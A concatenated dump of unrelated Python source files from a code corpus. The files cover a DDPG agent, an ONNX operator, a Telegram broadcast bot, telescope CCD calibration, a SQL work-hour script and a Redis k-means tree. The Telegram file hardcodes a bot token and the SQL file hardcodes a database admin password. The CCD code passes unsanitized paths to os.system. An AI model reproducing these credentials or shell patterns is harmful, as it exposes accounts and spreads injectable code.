b2, W3, b3]\n\n def build_target_critic_network(self, critic_vars: list):\n\n ema = tf.train.ExponentialMovingAverage(decay=1 - self.config[\"tau\"])\n target_update = ema.apply(critic_vars)\n target_net = [ema.average(v) for v in critic_vars]\n\n x = self.states\n if self.config[\"critic_layer_norm\"]:\n x = batch_norm_layer(x, training_phase=self.is_training, scope_bn=\"batch_norm_0\", activation=tf.identity)\n x = tf.nn.relu(tf.nn.xw_plus_b(x, target_net[0], target_net[1]))\n x = tf.nn.relu(tf.matmul(x, target_net[2]) + tf.matmul(self.actions_taken, target_net[3]) + target_net[4])\n q_value_output = tf.nn.xw_plus_b(x, target_net[5], target_net[6])\n\n return q_value_output, target_update\n\n def actor_gradients(self, state_batch: np.ndarray, action_batch: np.ndarray):\n q, grads = tf.get_default_session().run([self.q_value_output, self.action_gradients], feed_dict={\n self.states: state_batch,\n self.actions_taken: action_batch,\n self.is_training: False\n })\n summary = tf.Summary()\n summary.value.add(tag=\"model/actor_loss\", simple_value=float(-np.mean(q)))\n self.summary_writer.add_summary(summary, self.n_updates)\n return grads[0]\n\n def target_q(self, states: np.ndarray, actions: np.ndarray):\n return tf.get_default_session().run(self.target_q_value_output, feed_dict={\n self.states: states,\n self.actions_taken: actions,\n self.is_training: False\n })\n\n def q_value(self, states: np.ndarray, actions: np.ndarray):\n return tf.get_default_session().run(self.q_value_output, feed_dict={\n self.states: states,\n self.actions_taken: actions,\n self.is_training: False\n })\n\n def actions(self, states: np.ndarray) -> np.ndarray:\n \"\"\"Get the actions for a batch of states.\"\"\"\n return tf.get_default_session().run(self.action_output, feed_dict={\n self.states: states,\n self.is_training: True\n })\n\n def action(self, state: np.ndarray) -> np.ndarray:\n \"\"\"Get the action for a single state.\"\"\"\n return tf.get_default_session().run(self.action_output, feed_dict={\n self.states: [state],\n self.is_training: False\n })[0]\n\n def target_actions(self, states: np.ndarray) -> np.ndarray:\n \"\"\"Get the actions for a batch of states using the target actor network.\"\"\"\n return tf.get_default_session().run(self.target_action_output, feed_dict={\n self.states: states,\n self.is_training: True\n })\n\n def train(self):\n sample = self.replay_buffer.get_batch(int(self.config[\"batch_size\"]))\n\n # for n_actions = 1\n action_batch = np.resize(sample[\"actions\"], [int(self.config[\"batch_size\"]), self.n_actions])\n\n # Calculate critic targets\n next_action_batch = self.target_actions(sample[\"states1\"])\n q_value_batch = self.target_q(sample[\"states1\"], next_action_batch)\n critic_targets = sample[\"rewards\"] + (1 - sample[\"terminals1\"]) * \\\n self.config[\"gamma\"] * q_value_batch.squeeze()\n critic_targets = np.resize(critic_targets, [int(self.config[\"batch_size\"]), 1]).astype(np.float32)\n # Update actor weights\n fetches = [self.q_value_output, self.critic_loss, self.critic_train_op]\n predicted_q, critic_loss, _ = tf.get_default_session().run(fetches, feed_dict={\n self.critic_target: critic_targets,\n self.states: sample[\"states0\"],\n self.actions_taken: action_batch,\n self.is_training: True\n })\n\n summary = tf.Summary()\n summary.value.add(tag=\"model/critic_loss\", simple_value=float(critic_loss))\n summary.value.add(tag=\"model/predicted_q_mean\", simple_value=np.mean(predicted_q))\n summary.value.add(tag=\"model/predicted_q_std\", simple_value=np.std(predicted_q))\n self.summary_writer.add_summary(summary, self.n_updates)\n\n # Update the actor using the sampled gradient:\n action_batch_for_gradients = self.actions(sample[\"states0\"])\n q_gradient_batch = self.actor_gradients(sample[\"states0\"], action_batch_for_gradients)\n\n tf.get_default_session().run(self.actor_train_op, feed_dict={\n self.q_gradient_input: q_gradient_batch,\n self.states: sample[\"states0\"],\n self.is_training: True\n })\n\n # Update the target networks\n tf.get_default_session().run([self.update_targets_op, self.model_summary_op])\n self.n_updates += 1\n\n def noise_action(self, state: np.ndarray):\n \"\"\"Choose an action based on the actor and exploration noise.\"\"\"\n action = self.action(state)\n return action + self.action_noise()\n\n def learn(self):\n max_action = self.env.action_space.high\n self._initalize()\n with self.session as sess, sess.as_default():\n for episode in range(int(self.config[\"n_episodes\"])):\n state = self.env.reset()\n episode_reward = 0\n episode_length = 0\n for _ in range(int(self.config[\"n_timesteps\"])):\n action = self.noise_action(state)\n new_state, reward, done, _ = self.env.step(action * max_action)\n episode_length += 1\n episode_reward += reward\n self.replay_buffer.add(state, action, reward, new_state, done)\n if self.replay_buffer.n_entries > self.config[\"replay_start_size\"]:\n self.train()\n state = new_state\n if done:\n self.action_noise.reset()\n summary = tf.Summary()\n summary.value.add(tag=\"env/Episode_length\",\n simple_value=float(episode_length))\n summary.value.add(tag=\"env/Reward\",\n simple_value=float(episode_reward))\n self.summary_writer.add_summary(summary, episode)\n self.summary_writer.flush()\n break\n","sub_path":"yarll/agents/ddpg.py","file_name":"ddpg.py","file_ext":"py","file_size_in_byte":14189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"606882930","text":"# -*- encoding: utf-8 -*-\n# pylint: disable=E0203,E1101,C0111\n\"\"\"\n@file\n@brief Runtime operator.\n\"\"\"\nimport numpy\nfrom ._op import OpRun\n\n\ndef _batchnorm_test_mode(x, s, bias, mean, var, epsilon=1e-5):\n dims_x = len(x.shape)\n dim_ones = (1,) * (dims_x - 2)\n s = s.reshape(-1, *dim_ones)\n bias = bias.reshape(-1, *dim_ones)\n mean = mean.reshape(-1, *dim_ones)\n var = var.reshape(-1, *dim_ones)\n return s * (x - mean) / numpy.sqrt(var + epsilon) + bias\n\n\nclass BatchNormalization(OpRun):\n\n atts = {'epsilon': 1e-5, 'momentum': 0.9}\n\n def __init__(self, onnx_node, desc=None, **options):\n OpRun.__init__(self, onnx_node, desc=desc,\n expected_attributes=BatchNormalization.atts,\n **options)\n\n def _run(self, x, scale, bias, mean, var): # pylint: disable=W0221\n res = _batchnorm_test_mode(\n x, scale, bias, mean, var, epsilon=self.epsilon)\n return (res, )\n\n def _infer_shapes(self, x, scale, bias, mean, var): # pylint: disable=W0221\n return (x, )\n","sub_path":"mlprodict/onnxrt/ops_cpu/op_batch_normalization.py","file_name":"op_batch_normalization.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"359237166","text":"import asyncio\nimport ujson\nimport logging\nfrom string import Template\n\nimport templates\n\nfrom aiogram import Bot, Dispatcher, types\nfrom aiogram.utils import exceptions, executor\n\nfrom utils import get_rent_type\n\nAPI_TOKEN = \"805817039:AAGeuzqxxJ0HjEL43f8TBtMmjl1Yo4oECRo\"\n\nlogging.basicConfig(level=logging.INFO)\nlog = logging.getLogger(\"broadcast\")\n\nbot = Bot(token=API_TOKEN, parse_mode=types.ParseMode.HTML)\ndp = Dispatcher(bot)\n\n\ndef get_users():\n users = []\n with open(\"users\", \"r\") as f:\n users = f.readlines()\n yield from set(users)\n\n\nasync def send_message(user_id: int, text: str, disable_notification: bool = False) -> bool:\n \"\"\"\n Safe messages sender\n\n :param user_id:\n :param text:\n :param disable_notification:\n :return:\n \"\"\"\n try:\n await bot.send_message(user_id, text, disable_notification=disable_notification)\n except exceptions.BotBlocked:\n log.error(f\"Target [ID:{user_id}]: blocked by user\")\n except exceptions.ChatNotFound:\n log.error(f\"Target [ID:{user_id}]: invalid user ID\")\n except exceptions.RetryAfter as e:\n log.error(f\"Target [ID:{user_id}]: Flood limit is exceeded. Sleep {e.timeout} seconds.\")\n await asyncio.sleep(e.timeout)\n return await send_message(user_id, text) # Recursive call\n except exceptions.UserDeactivated:\n log.error(f\"Target [ID:{user_id}]: user is deactivated\")\n except exceptions.TelegramAPIError:\n log.exception(f\"Target [ID:{user_id}]: failed\")\n else:\n log.info(f\"Target [ID:{user_id}]: success\")\n return True\n return False\n\n\nasync def broadcaster() -> int:\n count = 0\n try:\n for user_id in get_users():\n with open(\"need_broadcast\", \"r\") as f:\n for raw_apartment in f:\n apartment = ujson.loads(raw_apartment)\n apartment_message = Template(templates.single_apartment).safe_substitute(\n rooms_count=get_rent_type(apartment[\"rent_type\"]),\n price_usd=apartment[\"price\"][\"converted\"][\"USD\"][\"amount\"],\n address=apartment[\"location\"][\"address\"] or apartment[\"location\"][\"user_address\"],\n photo=apartment[\"photo\"],\n )\n if await send_message(user_id, apartment_message):\n count += 1\n await asyncio.sleep(0.05) # 20 messages per second (Limit: 30 messages per second)\n finally:\n log.info(f\"{count} messages successful sent.\")\n\n return count\n\n\nif __name__ == \"__main__\":\n # Execute broadcaster\n executor.start(dp, broadcaster())\n","sub_path":"broadcaster.py","file_name":"broadcaster.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"331398057","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import optimize\nfrom astropy.io import fits\nfrom astropy.time import Time\nimport pandas\nimport os\nfrom ztfquery import query\n\n# Class to get CCD image\nclass ccdimage:\n\n def __init__(self, imgfile): \n self.imgfile = imgfile\n \n def polynom2(self, x, a0, a1, a2):\n # 2nd order polynomial function to fit overscan\n return a0 + a1*x + a2*x**2\n \n def overscan_correction(self, quadrant, overscan):\n # Fit x-overscan pixels (y-stacked in [4:27]) with 2nd-order polynomial function \n over_profil = np.median(overscan[:,4:27], axis=1)\n xpixel = np.arange(3080)\n over_median = np.median(over_profil)\n df_overscan = pandas.DataFrame({'xpix': xpixel, 'yval': over_profil})\n over_cut = 2*over_median\n flag = df_overscan[\"yval\"] Missing file:\", img_file)\n return q\n \n def linearity_correction(self, cID, aID, quad_in):\n # Extract linearity coefficients\n ccdID = int(cID)\n ampID = int(aID)-1\n coeff_file = \"CCD_amp_coeff_v2.txt\"\n coeff = pandas.read_csv(coeff_file, comment='#', header=None, sep='\\s+', usecols=[0, 1, 2, 3, 4]) \n coeff.columns = ['CCDID', 'AMP_NAME', 'AMP_ID', 'A', 'B']\n flag_ccdID = coeff['CCDID']==ccdID\n coeff = coeff[flag_ccdID]\n flag_ampID = coeff['AMP_ID']==ampID\n coeff = coeff[flag_ampID]\n A = float(coeff.loc[coeff.index[0],'A'])\n B = float(coeff.loc[coeff.index[0],'B'])\n # Perform quadratic correction on pixel counting\n quad_out = quad_in / (A*quad_in*quad_in + B*quad_in + 1)\n return quad_out\n\n def get_ccd_raw(self, img_file=None, overscan_corr=True, linearity_corr=True):\n # Merging of the 4 quadrants (00, 01, 02, 03) of a CCD from raw data\n # in a single image with the quadrant sub-structure\n # q2 q1\n # q3 q4\n # Read CCD quadrants\n if (img_file is None):\n img_file = self.imgfile\n q1 = self.read_quadrant(img_file, 1)\n q2 = self.read_quadrant(img_file, 2)\n q3 = self.read_quadrant(img_file, 3)\n q4 = self.read_quadrant(img_file, 4)\n # Read CCD overscans\n if (overscan_corr):\n o1 = self.read_quadrant(img_file, 5)\n o2 = self.read_quadrant(img_file, 6)\n o3 = self.read_quadrant(img_file, 7)\n o4 = self.read_quadrant(img_file, 8)\n # Overscan correction with 2nd-order polynomial fit of overscan\n q1 = self.overscan_correction(q1, o1)\n q2 = self.overscan_correction(q2, o2)\n q3 = self.overscan_correction(q3, o3)\n q4 = self.overscan_correction(q4, o4) \n # Per-quadrant linearity correction on pixel counting based on a quadratic model fit to laboratory data \n if (linearity_corr):\n cID = self.get_ccd_id()\n q1 = self.linearity_correction(cID, '1', q1)\n q2 = self.linearity_correction(cID, '2', q2)\n q3 = self.linearity_correction(cID, '3', q3)\n q4 = self.linearity_correction(cID, '4', q4)\n # Each quadrant is rotated by 180° before merging\n q1 = np.rot90(q1, 2)\n q2 = np.rot90(q2, 2)\n q3 = np.rot90(q3, 2)\n q4 = np.rot90(q4, 2)\n # Horizontal merging of CCD quadrants 00 and 01 \n ccd_up = np.concatenate((q2, q1), axis=1) \n # Horizontal merging of CCD quadrants 02 and 03\n ccd_down = np.concatenate((q3, q4), axis=1) \n # Vertical merging of the two above half-CCD \n ccd = np.concatenate((ccd_down, ccd_up), axis=0) \n return ccd\n \n def image_ploting(self, image, Imin=0, Imax=0):\n # Plot image\n if (Imin==0 and Imax==0):\n m0 = np.median(image)\n s0 = np.std(image)\n Imin = m0 - s0\n Imax = m0 + s0\n if (s0 > m0):\n Imin = 0\n Imax = 2*m0\n fig = plt.figure(figsize=(10, 8))\n fig.add_subplot(111)\n plt.imshow(image, interpolation='nearest', origin='lower', cmap='gray', vmin=Imin, vmax=Imax)\n plt.colorbar()\n #fig.savefig(dirname+filename+\".png\", dpi=150, bbox_inches='tight')\n return\n\n def image_saving(self, filename, image):\n # Save image as fit file\n os.system(\"rm \"+filename)\n hdu = fits.PrimaryHDU()\n hdu.writeto(filename)#, clobber=True)\n fits.append(filename, image, overwrite=True)\n #os.system(\"fpack \"+filename)\n #os.system(\"rm \"+filename) \n return\n\n def get_ccd_id(self):\n # Extract CCD ID from imgage file name\n idx = self.imgfile.index('.fits') - 4\n return self.imgfile[idx:idx+2]\n\n def get_filter_id(self):\n # Extract CCD ID from imgage file name\n idx = self.imgfile.index('.fits') - 8\n return self.imgfile[idx:idx+2]\n\n def get_date(self):\n # Extract date from imgage file name\n idx = self.imgfile.index('/ZTF/raw/') + len('/ZTF/raw/')\n return self.imgfile[idx:idx+4] + self.imgfile[idx+5:idx+9]\n\n def get_dirname(self):\n # Extrtact general data directory from image file name\n idx = self.imgfile.index('ztf_') - 21\n return self.imgfile[0:idx]\n\n def get_imgname(self):\n # Extrtact image file name from full link\n idx = self.imgfile.index('ztf_')\n return self.imgfile[idx:len(self.imgfile)]\n\n def get_ccd_cal(self):\n # Get CCD bias image computed \n if (os.path.isfile(self.imgfile)):\n return fits.getdata(self.imgfile, 0)\n else:\n raise ValueError(\"-> Missing file:\", self.imgfile)\n\n def get_ccd_bias(self):\n # Get CCD ID\n cid = self.get_ccd_id()\n cnum = int(cid)\n # Get Date\n date = self.get_date()\n # Local query\n zquery = query.ZTFQuery()\n zquery.load_metadata(kind=\"cal\", caltype=\"bias\", sql_query=\"nightdate=\"+str(date)+\" AND ccdid=\"+str(cnum))\n list_bias = zquery.get_data_path(source=\"local\")\n if (len(list_bias)!=4):\n raise ValueError(\"Wrong number of bias files for this CCD image:\", self.imgfile)\n list_bias.sort()\n # Read CCD quadrants \n q1 = self.read_quadrant(list_bias[0], 0)\n q2 = self.read_quadrant(list_bias[1], 0)\n q3 = self.read_quadrant(list_bias[2], 0)\n q4 = self.read_quadrant(list_bias[3], 0)\n # Each quadrant is rotated by 180° before merging\n q1 = np.rot90(q1, 2)\n q2 = np.rot90(q2, 2)\n q3 = np.rot90(q3, 2)\n q4 = np.rot90(q4, 2)\n # Horizontal merging of CCD quadrants 00 and 01 \n ccd_up = np.concatenate((q2, q1), axis=1) \n # Horizontal merging of CCD quadrants 02 and 03\n ccd_down = np.concatenate((q3, q4), axis=1) \n # Vertical merging of the two above half-CCD \n ccd = np.concatenate((ccd_down, ccd_up), axis=0) \n return ccd\n\n def get_flat_name(self):\n # Get Date\n date = self.get_date()\n dirdate = date[0:4]+'/'+date[4:8]+'/'\n # Get directory\n dirname = self.get_dirname()+'cal/'+dirdate+'ccdflat/'\n # Get filter ID\n fid = self.get_filter_id()\n # Get CCD ID\n cid = self.get_ccd_id()\n # Define CCD flat name\n flatname = dirname+'ztf_'+date+'_000000_'+fid+'_c'+cid+'_f.fits'\n return flatname\n\n def get_ccd_flat(self):\n # Check that flat exist otherwise compute and write it\n flatname = self.get_flat_name()\n if (os.path.isfile(flatname)==False):\n # Check that directory destination exist otherwise create it\n self.set_flat_directory(flatname)\n # Compute flat and write it in dirname\n self.compute_ccd_flat(flatname)\n if (os.path.isfile(flatname)):\n return fits.getdata(flatname, 0)\n else:\n raise ValueError(\"-> Missing CCD flat file:\", imgfile)\n return ccd\n\n def set_flat_directory(self, flatname):\n # Get directory name\n idx = flatname.index('ztf_')\n dirname = flatname[0:idx]\n # Check if directory desdtination exists, otherwise create it\n if (os.path.isdir(dirname)):\n return\n else:\n os.system(\"mkdir \"+dirname)\n return\n\n def compute_ccd_flat(self, flatname):\n date = self.get_date()\n date_bis = '/'+date[0:4]+'/'+date[4:8]+'/'\n print(\"|-> Compute CCD flat-field for date\", date_bis)\n # Get list of raw flat fields\n list_flat = self.get_flat_list()\n # Check that list of raw flat fields is OK\n if (len(list_flat)==0):\n raise ValueError(\"No flat for image\", self.imgfile)\n n = len(list_flat)\n fid = self.get_filter_id()\n if ((fid=='zg' or fid=='zr') and n!=20):\n raise ValueError(\"Wrong number of flat files for image\", self.imgfile)\n if (fid=='zi' and n!=21):\n raise ValueError(\"Wrong number of flat files for image\", self.imgfile)\n # Get bias for the whole CCD\n ccd_bias = self.get_ccd_bias()\n # Stack flat fields after bias correction\n for i in range(n):\n if (i==0):\n ccd = self.get_ccd_raw(img_file=list_flat[i]) - ccd_bias\n else:\n ccd += self.get_ccd_raw(img_file=list_flat[i]) - ccd_bias\n # Normalized flat field to median\n ccd /= np.median(ccd)\n # Write flat field\n self.image_saving(flatname, ccd)\n return True\n\n def get_flat_list(self):\n # Get CCD ID\n cid = self.get_ccd_id()\n cnum = int(cid)\n # Get filter ID\n fid = self.get_filter_id()\n if (fid=='zg'):\n fnum = 1\n elif (fid=='zr'):\n fnum = 2\n elif (fid=='zi'):\n fnum = 3\n else:\n fnum = 0\n # Get date\n idx = self.imgfile.index('/ZTF/raw/') + len('/ZTF/raw/')\n year = self.imgfile[idx:idx+4] \n month = self.imgfile[idx+5:idx+7]\n day = self.imgfile[idx+7:idx+9]\n dates = [year+'-'+month+'-'+day+'T00:00:00', year+'-'+month+'-'+day+'T23:59:59']\n t = Time(dates, format='isot', scale='utc')\n dates_jd = t.jd \n # Local query\n zquery = query.ZTFQuery()\n zquery.load_metadata(kind=\"raw\", sql_query=\"imgtypecode='f' AND fid=\"+str(fnum)+\" AND ccdid=\"+str(cnum)+\" AND obsjd BETWEEN \"+str(dates_jd[0])+\" AND \"+str(dates_jd[1]))\n return zquery.get_data_path(source=\"local\")\n\n def compute_ccd_sci(self):\n img = self.get_imgname()\n print(\"|-> Compute CCD science image with global CCD flat-field corresponding to\", img)\n # Get CCD raw-overscan corrected image \n ccd_raw = self.get_ccd_raw()\n # Get CCD bias image\n ccd_bias = self.get_ccd_bias()\n # Get CCD flat image \n ccd_flat = self.get_ccd_flat() \n # Compute CCD science image\n ccd_corr = ccd_raw - ccd_bias\n ccd_sci = ccd_corr / ccd_flat\n # Divide CCD image in quadrant images\n quad = self.ccd_to_quadrant(ccd_sci)\n # Write each new science quadrant image with ZTF HDU\n self.write_quad(quad)\n return ccd_sci\n\n def get_my_sci_list(self):\n ztfsci_list = self.get_sci_list()\n # Generate my science image file names from ZTF science image file names \n mysci_list = []\n for i in range(len(ztfsci_list)):\n img_file = ztfsci_list[i]\n idx = img_file.index('.fits')\n mysci_list.append(img_file[0:idx]+'_in2p3.fits')\n return mysci_list\n\n def get_ztf_ccd_sci(self):\n # Get CCD science image computed by ZTF pipeline\n #print('--> Get ZTF CCD science image for on-sky image', self.imgfile)\n imglist = self.get_sci_list()\n return self.get_ccd_sci(imglist)\n\n def get_my_ccd_sci(self):\n # Get CCD science image computed with the global CCD flat-field\n #print('--> Get my CCD science image for on-sky image', self.imgfile)\n mysci_list = self.get_my_sci_list()\n # Check if my CCD science image exist otherwise create it\n if (os.path.isfile(mysci_list[0]) and os.path.isfile(mysci_list[1]) and os.path.isfile(mysci_list[2]) and os.path.isfile(mysci_list[3])):\n ccd_sci = self.get_ccd_sci(mysci_list)\n else:\n # Compute my CCD science images and write it \n ccd_sci = self.compute_ccd_sci()\n return ccd_sci\n\n def get_ccd_sci(self, imglist):\n # Merging of the 4 quadrants (00, 01, 02, 03) of a CCD from raw data\n # in a single image with the quadrant sub-structure\n # q2 q1\n # q3 q4\n # Read CCD quadrants \n q1 = self.read_quadrant(imglist[0], 0)\n q2 = self.read_quadrant(imglist[1], 0)\n q3 = self.read_quadrant(imglist[2], 0)\n q4 = self.read_quadrant(imglist[3], 0)\n # Each quadrant is rotated by 180° before merging\n q1 = np.rot90(q1, 2)\n q2 = np.rot90(q2, 2)\n q3 = np.rot90(q3, 2)\n q4 = np.rot90(q4, 2)\n # Horizontal merging of CCD quadrants 00 and 01 \n ccd_up = np.concatenate((q2, q1), axis=1) \n # Horizontal merging of CCD quadrants 02 and 03\n ccd_down = np.concatenate((q3, q4), axis=1) \n # Vertical merging of the two above half-CCD \n ccd = np.concatenate((ccd_down, ccd_up), axis=0) \n return ccd\n\n def get_sci_list(self):\n # Get CCD ID\n cid = self.get_ccd_id()\n cnum = int(cid)\n # Get filter ID\n fid = self.get_filter_id()\n if (fid=='zg'):\n fnum = 1\n elif (fid=='zr'):\n fnum = 2\n elif (fid=='zi'):\n fnum = 3\n else:\n fnum = 0\n # Get field\n idx = self.imgfile.index(fid) - 7\n field = int(self.imgfile[idx:idx+6])\n # Get date\n idx = self.imgfile.index('/ZTF/raw/') + len('/ZTF/raw/')\n year = self.imgfile[idx:idx+4] \n month = self.imgfile[idx+5:idx+7]\n day = self.imgfile[idx+7:idx+9]\n dates = [year+'-'+month+'-'+day+'T00:00:00', year+'-'+month+'-'+day+'T23:59:59']\n t = Time(dates, format='isot', scale='utc')\n dates_jd = t.jd \n # Local query\n zquery = query.ZTFQuery()\n zquery.load_metadata(kind=\"sci\", sql_query=\"fid=\"+str(fnum)+\" AND ccdid=\"+str(cnum)+ \"AND field=\"+str(field)+\" AND obsjd BETWEEN \"+str(dates_jd[0])+\" AND \"+str(dates_jd[1]))\n ztfsci_list = zquery.get_data_path(source=\"local\", suffix=\"sciimg.fits\")\n if (len(ztfsci_list)!=4):\n raise ValueError(\"Wrong number of science files for CCD image:\", self.imgfile)\n return ztfsci_list\n\n def ccd_to_quadrant(self, ccd):\n # Divide CCD image in quadrant\n nX = int(len(ccd[0])/2)\n nY = int(len(ccd)/2)\n quad = []\n # Quadrant 01\n q1 = ccd[nY:2*nY,nX:2*nX]\n q1 = np.rot90(q1, 2)\n quad.append(q1)\n # Quadrant 02\n q2 = ccd[nY:2*nY,0:nX]\n q2 = np.rot90(q2, 2)\n quad.append(q2)\n # Quadrant 03\n q3 = ccd[0:nY,0:nX]\n q3 = np.rot90(q3, 2)\n quad.append(q3) \n # Quadrant 04\n q4 = ccd[0:nY,nX:2*nX]\n q4 = np.rot90(q4, 2)\n quad.append(q4)\n return quad\n\n def write_quad(self, quad):\n # Get ZTF science image names\n ztfscilist = self.get_sci_list()\n # Get my science image names\n myscilist = self.get_my_sci_list()\n # Write each new science quadrant image with original ZTF HDU\n for i in range(len(myscilist)): \n ztf = fits.open(ztfscilist[i])\n hdr = ztf[0].header\n os.system(\"rm \"+myscilist[i])\n hdu = fits.PrimaryHDU(data=quad[i], header=hdr)\n hdu.writeto(myscilist[i]) \n return \n","sub_path":"ztfccdimage.py","file_name":"ztfccdimage.py","file_ext":"py","file_size_in_byte":16662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"366483203","text":"#!/usr/bin/python3.4\n#-*- coding: utf-8 -*-\n\n\"\"\" \nLeftovers from the projects resolutions, to take a deeper look\n\n\"\"\"\n\ndef combination(values,first=False,final=[]):\n\t\"\"\"\n\tReturns a list with all possible combinations of items in list 'values'\n\n\tIt returns with duplicates, it must be a faster/cleaner way of doing it\n\t\"\"\"\n\n\tif len(values) > 0:\n\t\t\n\t\tfinal.append(values)\n\t\tcombination(values[1:],final=final)\n\t\t\t\t\n\t\tfor n in range(1,len(values)):\n\t\t\tnew_values = copy.deepcopy(values)\n\t\t\tnew_values.pop(n)\n\t\t\tcombination(new_values,final=final)\n\n\tif first:\n\t\treturn final\n\n","sub_path":"notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"19765907","text":"# -*- coding: utf-8 -*-\nimport pymssql\nimport numpy as np\nfrom numpy.linalg import solve\n'''\na=np.mat([[2,3],[1,3]])#系数矩阵\nb=np.mat([0,0]).T #常数项列矩阵\nx=solve(a,b) #方程组的解\nprint(x)\n'''\n\ndef sv(x1,x2,y1,y2):\n a = np.array([[x1, x2], [1, 1]])\n b = np.array([y1, y2])\n return solve(a, b)\n\n\nwith pymssql.connect(host='10.1.42.103', user=\"sa\", password=\"qfc23834358Q\",database=\"test2\") as conn:\n cur=conn.cursor()\n #cur.execute(\"select [工程编号],[小计],[施工服务],[填报工时],[总预算工时] from wh_table2 where [工程编号] in ('GC150235','GC150082','GC160217','GC150067','GC170374','GC170117') order by [工程编号] asc\")\n #cur.execute(\"select [工程编号],[小计],[施工服务],[填报工时],[总预算工时] from wh_table2 where [工程编号] in ('GC150235','GC160217','GC150067','GC170374') order by [工程编号] asc\")\n cur.execute(\"select [工程编号],[小计],[施工服务],[总预算工时]*[总工时系数],[总预算工时] from wh_table2 where [阶段组合] IN ('初设+施工图+施工服务','方案+施工图+施工服务','方案+初设+施工图+施工服务','施工图+施工服务','方案配合+初设+施工图+施工服务','方案配合+初设配合+施工图+施工服务') and [施工服务]>0 and [小计]>0.2 and [工程编号] in (select fd_project_no from [10.1.1.117].cip.dbo.wt_project_info where doc_create_time>'2015-01-01' and doc_company_id in (select fd_id from [10.1.1.117].cip.dbo.sys_org_element where fd_ldap_dn='OU=深圳公司,OU=华阳设计,OU=华阳国际,DC=capol,DC=cn')) order by [工程编号] asc\")\n res=cur.fetchall()\n a_y=b_y=0\n z_t=z_y=0\n a_t=b_t=0\n for (gcno,x1,x2,y1,y2) in res:\n x=sv(x1,x2,y1,y2)\n print(gcno)\n print(x)\n a_y+=x[0]\n b_y+=x[1]\n z_t+=y1\n z_y+=y2\n a_t+=x[0]*x1\n b_t+=x[1]*x2\n r={'设计预算':a_y,'设计填报':a_t,'施工预算':b_y,'施工填报':b_t,'总预算':z_y,'总填报':z_t}\n print(r)\n \n print(r['设计预算']+r['施工预算'])\n print(r['总预算'])\n print(r['设计填报']+r['施工填报'])\n print(r['总填报'])\n print(r['设计填报']/r['设计预算'])\n print(r['施工填报']/r['施工预算'])\n\n\n","sub_path":"工时系数解方程测试.py","file_name":"工时系数解方程测试.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"607419679","text":"import redis\nimport random\nimport time\nimport queue\nimport numpy as np\nfrom .redis_db import RedisDBWrapper\nfrom .fast_kmeans import FastKmeans\n\n\n#代表Balanced K-means tree的节点\nclass BKTNode(object):\n\n def __init__(self):\n self.id = str(id(self))\n self.cluster_id = None\n self.children = []\n self.parent = None\n self.centriod = None\n self.leaf = False\n\n #读取该节点的数据,如果是叶节点,则只读取它所对应的簇数据,如果是非叶节点,则读取它子树的所有簇数据\n #参数 redis_handler: redis handler\n #参数 bkt_key: 该节点所在的树的唯一标识\n def get_data(self, redis_handler, bkt_key):\n if not redis_handler:\n return None\n\n if self.leaf:\n return redis_handler.get_data(bkt_key + '_' + self.parent.id + '_' + str(self.cluster_id))\n\n merged_data = np.zeros(shape = (1, self.centriod.shape[0]))\n\n for child in self.children:\n data = child.get_data(redis_handler, bkt_key)\n merged_data = np.concatenate((merged_data, data), axis = 0)\n\n return merged_data[1:]\n\n\n#代表Balanced K-means tree\nclass BKTree(object):\n\n #初始化Balanced K-means tree\n #参数 max_clusters_per_run: 指定每次K-means聚类的最大簇数量\n #参数 max_depth : 指定树的高度限制\n #参数 min_cluster_size : 指定簇中数据的最小数量,即最小簇大小\n #参数 sc : spark context\n #参数 redis_host : 指定用于存储簇数据的redis host\n #参数 redis_port : 指定用于存储簇数据的redis port\n #参数 max_cluster_size : 指定簇中数据的最大数量,是个软约束,如果不指定的话就默认是min_cluster_size的2倍\n def __init__(self, max_clusters_per_run, max_depth, min_cluster_size, sc, redis_host, redis_port = 6379, max_cluster_size = 0, balance = True):\n self.__max_clusters_per_run = max_clusters_per_run\n self.__max_depth = max_depth\n self.__min_cluster_size = min_cluster_size\n self.__max_cluster_size = max(self.__min_cluster_size, max_cluster_size)\n self.__sc = sc\n self.__redis_host = redis_host\n self.__redis_port = redis_port\n self.__bkt_key = str(id(self))\n self.__balance = balance\n self.__root_node = BKTNode()\n self.__redis = RedisDBWrapper(redis_host, redis_port)\n\n def get_root(self):\n return self.__root_node\n\n def get_key(self):\n return self.__bkt_key\n\n def get_redis(self):\n return self.__redis.getHandler()\n\n def get_leaf_nodes(self):\n leaf_nodes = []\n\n q = queue.Queue()\n q.put(self.__root_node)\n\n while not q.empty():\n node = q.get()\n\n if node.leaf:\n leaf_nodes.append(node)\n else:\n for child in node.children:\n q.put(child)\n\n return leaf_nodes\n\n\n def dump(self):\n\n epochTime = int(time.mktime(time.localtime()))\n\n tree_params = self.__bkt_key + '_' + str(self.__max_clusters_per_run) + '_' + str(self.__max_depth) + '_' \\\n + str(self.__min_cluster_size) + '_' + str(self.__max_cluster_size) + '_' \\\n + str(self.__balance) + '_' + self.__root_node.id\n\n self.get_redis().sadd('my_bkt', str(epochTime) + '_' + tree_params)\n\n q = queue.Queue()\n q.put(self.__root_node)\n\n try:\n while not q.empty():\n node = q.get()\n\n if node.leaf:\n value = '1_' + str(node.cluster_id)\n elif node.cluster_id:\n value = '0_' + str(node.cluster_id)\n else:\n value = '0_0'\n\n ret = self.get_redis().set(self.__bkt_key + '_' + node.id, value)\n if not ret:\n raise Exception(\"Failed to dump BKT node to redis\")\n\n for child in node.children:\n ret = self.get_redis().sadd(self.__bkt_key + '_' + node.id + '_children', child.id)\n if not ret:\n raise Exception(\"Failed to dump BKT sub tree to redis\")\n\n q.put(child)\n\n return True\n except Exception as e:\n print(e)\n return False\n\n\n def update_centroid(self, node):\n\n if node.leaf:\n data = self.__redis.get_data(self.__bkt_key + '_' + node.parent.id + '_' + 